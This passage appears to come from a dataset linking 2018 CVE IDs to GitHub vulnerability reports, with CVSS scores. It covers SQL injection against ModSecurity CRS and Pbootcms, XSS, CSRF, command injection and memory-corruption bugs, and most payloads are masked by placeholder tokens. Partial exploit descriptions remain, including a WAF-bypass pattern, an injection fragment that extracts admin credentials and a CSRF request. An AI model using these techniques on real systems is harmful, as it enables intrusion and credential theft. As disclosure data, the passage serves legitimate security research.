        "Issue_Url_new": "https://github.com/spiderlabs/owasp-modsecurity-crs/issues/1167",
        "Repo_new": "spiderlabs/owasp-modsecurity-crs",
        "Issue_Created_At": "2018-08-10T07:24:37Z",
        "description": "Bypass the latest crs NUMBERTAG rc3 rules for SQL injection. Vulnerability demo(php+mysql+apache) FILETAG ERRORTAG Download and install the latest NUMBERTAG rc3 rules and enable blocking protection for testing. I found a way to bypass the rules for SQL injection through black box testing. This method is: {\\ APITAG b} , where a is a special function name, such as if, version, etc., and b is the sql statement to be executed. Using the method to successfully bypass the rules for SQL injection, you can see that the database name was successfully read using the error. CODETAG FILETAG In this way, you can use this method to bypass the crs rules and get any content in the database in the vulnerable system. Please fix this security issue as soon as APITAG You.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16398",
        "Issue_Url_old": "https://github.com/twistlock/authz/issues/50",
        "Issue_Url_new": "https://github.com/twistlock/authz/issues/50",
        "Repo_new": "twistlock/authz",
        "Issue_Created_At": "2018-07-16T12:27:09Z",
        "description": "[security issue]policy bypass. Regular expressions used by Authz are relatively simple and may be bypassed For example, we allow only the docker start in the policy, and docker pause is not allowed. Normal access to URLTAG will be rejected But we can be accessed the url PATHTAG to bypass Authz\u2019s policy restrictions The above regular expression can bypass the Authz limit and run docker pause success",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16412",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1250",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1250",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-08-19T14:19:35Z",
        "description": "heap buffer overflow bug in APITAG APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING ` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch PATHTAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Feb NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: APITAG May I know whether this can be assigned with a CVE ID?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16552",
        "Issue_Url_old": "https://github.com/MicroPyramid/Django-CRM/issues/68",
        "Issue_Url_new": "https://github.com/micropyramid/django-crm/issues/68",
        "Repo_new": "micropyramid/django-crm",
        "Issue_Created_At": "2018-09-04T13:25:44Z",
        "description": "CSRF vulnerability almost all forms. For example APITAG creation form has no csrf token validation, so that attacker can create own account by sending malicious link POC : CODETAG EXPLOIT REQUEST: POST PATHTAG HTTP NUMBERTAG Host: django APITAG User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en GB,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16641",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1206",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1206",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-12T07:28:06Z",
        "description": "There is a potential memory leak in codes/tiff.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a potential memory leak vulnerability in APITAG function in coders/tiff.c. Steps to Reproduce As we can see, there is a check for base_image equals to NULL or not in line NUMBERTAG URLTAG At the same time, there are several call to ERRORTAG in line NUMBERTAG line NUMBERTAG line NUMBERTAG and line NUMBERTAG I think base_image should be destroyed firstly before call ERRORTAG Otherwise, there would be a memory leak vulnerability. ERRORTAG System Configuration APITAG APITAG version: latest version Environment APITAG system, version and so on): Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16710",
        "Issue_Url_old": "https://github.com/foosel/OctoPrint/issues/2814",
        "Issue_Url_new": "https://github.com/octoprint/octoprint/issues/2814",
        "Repo_new": "octoprint/octoprint",
        "Issue_Created_At": "2018-09-07T06:20:39Z",
        "description": "APITAG configuration issues can lead to unauthorized access. Unauthorized access due to configuration issues can download configuration files, download videos, and more. URLTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16736",
        "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6437",
        "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6437",
        "Repo_new": "roundcube/roundcubemail",
        "Issue_Created_At": "2018-09-09T05:25:36Z",
        "description": "Persistent Cross Site Scripting in rcfilters plugin. Hi. when using rcfilters plugin version NUMBERTAG two parameters \"_whatfilter\" and \"_messages\" do not sanitize user input. therefore you can inject javascript code in them. since it's a self XSS, it may not have any impact security. a user can inject js and html code in his/her own account filters list. FILETAG tested on Roundcube Webmail version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16736",
        "Issue_Url_old": "https://github.com/eagle00789/RC_Filters/issues/19",
        "Issue_Url_new": "https://github.com/eagle00789/rc_filters/issues/19",
        "Repo_new": "eagle00789/rc_filters",
        "Issue_Created_At": "2018-09-09T05:25:13Z",
        "description": "Persistent Cross Site Scripting in rcfilters plugin. Hi. when using rcfilters plugin version NUMBERTAG two parameters \"_whatfilter\" and \"_messages\" do not sanitize user input. therefore you can inject javascript code in them. since it's a self XSS, it may not have any impact security. a user can inject js and html code in his/her own account filters list. FILETAG tested on Roundcube Webmail version NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16762",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/478",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/478",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2018-07-09T13:26:39Z",
        "description": "Vulnerability Code Evaluations & SQL Injections. Vulnerability Code Evaluations & SQL Injections Environment Version NUMBERTAG OS : Unix, Windows Web server : Any web server PHP NUMBERTAG Database : Any database Vulnerability Tree NUMBERTAG SQL Injection NUMBERTAG PATHTAG (GET = search_term NUMBERTAG PATHTAG (GET = layout NUMBERTAG PATHTAG (GET = published NUMBERTAG Code Evaluation NUMBERTAG PATHTAG (GET = filter NUMBERTAG fuel/preview (POST = data NUMBERTAG SQL Injection in PATHTAG (GET = search_term) URL: PATHTAG APITAG APITAG APITAG Parameter Name: search_term Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG SQL Injection in PATHTAG (GET = layout) URL: PATHTAG APITAG APITAG APITAG Parameter Name: layout Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG SQL Injection in PATHTAG (GET = published) URL: PATHTAG APITAG APITAG APITAG Parameter Name: published Parameter Type: GET Attack Pattern: APITAG APITAG APITAG NUMBERTAG Code Evaluation in PATHTAG (GET = filter) URL: PATHTAG APITAG NUMBERTAG b NUMBERTAG Parameter Name: filter Parameter Type: GET Attack Pattern NUMBERTAG b APITAG NUMBERTAG b NUMBERTAG Code Evaluation in /fuel/preview (POST = data) URL: PATHTAG Parameter Name: data Parameter Type: POST Attack Pattern NUMBERTAG b APITAG NUMBERTAG b NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17228",
        "Issue_Url_old": "https://github.com/narkisr/nmap4j/issues/9",
        "Issue_Url_new": "https://github.com/narkisr/nmap4j/issues/9",
        "Repo_new": "narkisr/nmap4j",
        "Issue_Created_At": "2018-09-19T02:24:35Z",
        "description": "command execution vulnerability. String path = APITAG String op = \" T4 p NUMBERTAG Nmap4j nmap4j = new Nmap4j(path); APITAG FILETAG \"); APITAG APITAG over here,the APITAG original intention is to receive hosts. When we add custom commands behind it, it will be executed.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17368",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/18",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/18",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2018-09-12T05:24:34Z",
        "description": "There is a brute force vulnerabillity via PATHTAG when I login, i find if i use a wrong username: FILETAG So we can use brute force to get the correct username beacuse the correct username has different response lenth FILETAG after we got the correct username,use the same way to get the correct password FILETAG FILETAG NUMBERTAG redirect means we login successful",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17419",
        "Issue_Url_old": "https://github.com/miekg/dns/issues/742",
        "Issue_Url_new": "https://github.com/miekg/dns/issues/742",
        "Repo_new": "miekg/dns",
        "Issue_Created_At": "2018-09-19T07:25:24Z",
        "description": "APITAG parsing error leading to nil pointer dereference. What did I do? APITAG ERRORTAG What happened? ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-17846",
        "Issue_Url_old": "https://github.com/golang/go/issues/27842",
        "Issue_Url_new": "https://github.com/golang/go/issues/27842",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2018-09-25T06:25:17Z",
        "description": "PATHTAG APITAG infinite loop via malformed data. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? APITAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? graceful exit What did you see instead? An infinite loop",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18024",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1337",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1337",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-10-05T12:25:23Z",
        "description": "infinite loop in APITAG of bmp.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG The following code will trigger an infinite loop when open the poc file which take up a lot of memory and cpu. There is a risk of dos. ERRORTAG Steps to Reproduce APITAG poc URLTAG magick convert $poc /dev/null System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18211",
        "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/1",
        "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/1",
        "Repo_new": "pbootcms/pbootcms",
        "Issue_Created_At": "2018-10-08T07:21:34Z",
        "description": "Pbootcms SQL injection in FILETAG . The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database. the mysql database directory: PATHTAG Authorization code required after installation,We can go to this URL and enter our ip to get the authorization code. URL: FILETAG APITAG This SQL injection requires background api functionality. APITAG FILETAG username=admin password NUMBERTAG When the api function is enabled in the background, the foreground api will have SQL injection. URLTAG POST:contacts[content`) VALUES ( APITAG /distinct/ APITAG /FROM/ /ay_user/ /limit NUMBERTAG e NUMBERTAG a NUMBERTAG mobile NUMBERTAG content NUMBERTAG We can get the admin account name and password APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-18290",
        "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/9",
        "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/9",
        "Repo_new": "gnat/nc-cms",
        "Issue_Created_At": "2018-10-14T19:20:41Z",
        "description": "nc cms Cross Site Scripting. Hello, I found that this cms may have some security problem you can edit your html on URLTAG url and you can Input any evil js you want APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-18409",
        "Issue_Url_old": "https://github.com/simsong/tcpflow/issues/195",
        "Issue_Url_new": "https://github.com/simsong/tcpflow/issues/195",
        "Repo_new": "simsong/tcpflow",
        "Issue_Created_At": "2018-10-15T13:58:19Z",
        "description": "Stack based buffer overflow in APITAG There exists a stack based buffer overflow in APITAG function at APITAG , invoked by APITAG in APITAG . The issue gets triggered when the value of depth in APITAG is set greater than NUMBERTAG being passed to i in APITAG . The APITAG function sets the ith bit to NUMBERTAG in case where the i value exceeds more than NUMBERTAG the computation goes wrong & a stack overflow is triggered. Tested version NUMBERTAG APITAG Command tcpflow a D b m o Fk \u2013r $POC Debugging: APITAG CODETAG Backtrace: ERRORTAG ASAN Report ERRORTAG Note: Issue reproducible when compiled with APITAG Please check if you are able to reproduce the issue via the Reproducer file URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18540",
        "Issue_Url_old": "https://github.com/Teakki/issue/issues/24",
        "Issue_Url_new": "https://github.com/teakki/issue/issues/24",
        "Repo_new": "teakki/issue",
        "Issue_Created_At": "2018-10-20T11:25:33Z",
        "description": "There is a xss. when add a new document, insert a picture, it can set the picture's url, so set it with ==> ERRORTAG ,after finished that, it will be pop a window. APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18541",
        "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/1536",
        "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/1536",
        "Repo_new": "teeworlds/teeworlds",
        "Issue_Created_At": "2018-10-20T19:20:56Z",
        "description": "CVE: Remote denial of service fixed in NUMBERTAG Hi, apparently version NUMBERTAG and version NUMBERTAG fix a remote denial of service vulnerability in Teeworlds. Did you request a CVE for this security issue? It appears that all versions prior NUMBERTAG are affected. Is this correct? Are these the fixing commits? URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18578",
        "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/5",
        "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/5",
        "Repo_new": "ky-j/dedecms",
        "Issue_Created_At": "2018-10-22T06:23:15Z",
        "description": "Reflected XSS Vulnerability exists in the file of APITAG NUMBERTAG docx. FILETAG APITAG Phink club",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18834",
        "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/81",
        "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/81",
        "Repo_new": "mz-automation/libiec61850",
        "Issue_Created_At": "2018-10-29T15:52:16Z",
        "description": "Heap buffer overflow in function APITAG I used gcc NUMBERTAG and APITAG ( APITAG before make ) to build libiec NUMBERTAG URLTAG . In the directory APITAG , the following specific APITAG sequence will cause heap buffer overflow in function APITAG in APITAG : CODETAG However, if the APITAG is constructed like following two way, this error will not be triggered. APITAG or CODETAG In detail, the complete version of APITAG that triggers heap buffer overflow is FILETAG . In order to verify this problem, just replace it with initial APITAG in APITAG , compile it and run it by command APITAG . This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18927",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/22",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/22",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2018-11-01T13:26:09Z",
        "description": "There is a stored xss via PATHTAG in logo. Hello,my nickname is isecream,I found a stored xss in the logo First, access the page FILETAG the logo is obtained from database. FILETAG Then\uff0ci write the xss payload to the database via PATHTAG FILETAG you can see,the value has been changed FILETAG And then,access the last page FILETAG so,there is a stored xss in the all logo",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19135",
        "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/494",
        "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/494",
        "Repo_new": "clippercms/clippercms",
        "Issue_Created_At": "2018-11-10T18:21:01Z",
        "description": "APITAG NUMBERTAG File Upload CSRF Vulnerability. Hi, This is regarding the APITAG NUMBERTAG File Upload CSRF Vulnerability that I already reported by sending a direct email last August NUMBERTAG regarding this issue and followed up on September NUMBERTAG and September NUMBERTAG but haven't received any reply. APITAG NUMBERTAG does not have CSRF protection on its kcfinder file upload which is being used by default. This can be used by an attacker to perform actions for an admin (or any user with file upload capability). With this vulnerability, it can automatically upload file/s _(by default it allows APITAG as file types)_. Note that web shell that can be used for remote code execution can be achieved depending on the file types being accepted. Uploaded file can be accessed publicly on the \" /assets/files \" directory (e.g. uploaded a malicious html file with filename: FILETAG file => URLTAG This can lead for the website to be host unintended file/s. Steps to reproduce: Admin (or user with file upload capability) logged in APITAG NUMBERTAG browse/open a controlled website with the poc below (e.g. by link or open APITAG below in a browser where admin/user logged in to APITAG NUMBERTAG file is uploaded and can be accessed on URLTAG (where FILETAG is the filename of the uploaded file) Proof of Concept: APITAG below will automatically upload a \" FILETAG \" file with simple XSS payload. Steps above are how to make use of the APITAG ERRORTAG Actual video demo of the APITAG NUMBERTAG file upload CSRF vulnerability being exploited: ![IMAGE ALT TEXT HERE URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19139",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/188",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/188",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-11-09T08:25:24Z",
        "description": "memory leak detected. Hello jasper team, I have identified an issue affecting jasper by using AFL fuzz. PATHTAG valgrind v tool=memcheck leak check=full jasper input APITAG output FILETAG output format bmp NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: jasper input APITAG output FILETAG output format bmp NUMBERTAG algrind options NUMBERTAG tool=memcheck NUMBERTAG leak check=full NUMBERTAG Contents of /proc/version NUMBERTAG Linux version NUMBERTAG kali1 amd NUMBERTAG EMAILTAG rg) (gcc version NUMBERTAG APITAG NUMBERTAG SMP Debian NUMBERTAG kali NUMBERTAG Arch and hwcaps: AMD NUMBERTAG APITAG amd NUMBERTAG c NUMBERTAG lzcnt rdtscp sse3 avx a NUMBERTAG bmi NUMBERTAG Page sizes: currently NUMBERTAG max supported NUMBERTAG algrind library directory: PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG f3df wanted NUMBERTAG e0f NUMBERTAG c NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG object doesn't have a dynamic symbol table NUMBERTAG Scheduler: using generic scheduler lock implementation NUMBERTAG Reading suppressions file: PATHTAG NUMBERTAG embedded gdbserver: reading from /tmp/vgdb pipe from vgdb to NUMBERTAG by root on NUMBERTAG embedded gdbserver: writing to /tmp/vgdb pipe to vgdb from NUMBERTAG by root on NUMBERTAG embedded gdbserver: shared mem /tmp/vgdb pipe shared mem vgdb NUMBERTAG by root on NUMBERTAG TO CONTROL THIS PROCESS USING vgdb (which you probably NUMBERTAG don't want to do, unless you know exactly what you're doing NUMBERTAG or are doing some strange experiment NUMBERTAG PATHTAG pid NUMBERTAG command NUMBERTAG TO DEBUG THIS PROCESS USING GDB: start GDB like this NUMBERTAG PATHTAG jasper NUMBERTAG and then give GDB the following command NUMBERTAG target remote | PATHTAG pid NUMBERTAG pid is optional if only one valgrind process is running NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG strlen) redirected to NUMBERTAG APITAG NUMBERTAG REDIR NUMBERTAG e NUMBERTAG ld linu NUMBERTAG so NUMBERTAG index) redirected to NUMBERTAG b APITAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a2a NUMBERTAG wanted NUMBERTAG c7eb NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG CRC mismatch (computed NUMBERTAG a NUMBERTAG wanted NUMBERTAG af NUMBERTAG a NUMBERTAG Considering PATHTAG NUMBERTAG CRC is valid NUMBERTAG WARNING: new redirection conflicts with existing ignoring it NUMBERTAG old NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG APITAG NUMBERTAG new NUMBERTAG e NUMBERTAG strlen ) R NUMBERTAG a NUMBERTAG strlen NUMBERTAG REDIR NUMBERTAG aab0 (ld linu NUMBERTAG so NUMBERTAG strcmp) redirected to NUMBERTAG b NUMBERTAG strcmp NUMBERTAG REDIR NUMBERTAG e7d0 (ld linu NUMBERTAG so NUMBERTAG mempcpy) redirected to NUMBERTAG d1a0 (mempcpy NUMBERTAG Reading syms from PATHTAG NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG Reading syms from PATHTAG NUMBERTAG Considering PATHTAG NUMBERTAG build id is valid NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bcd0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c2b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2e NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d1c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2cff0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG b NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c1e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bdb0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d4c0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c2e0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2bd NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2c1b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG b0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2d3d0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c2cfc0 APITAG redirected to NUMBERTAG b1c0 APITAG NUMBERTAG REDIR NUMBERTAG c NUMBERTAG APITAG redirected to NUMBERTAG b1c0 APITAG 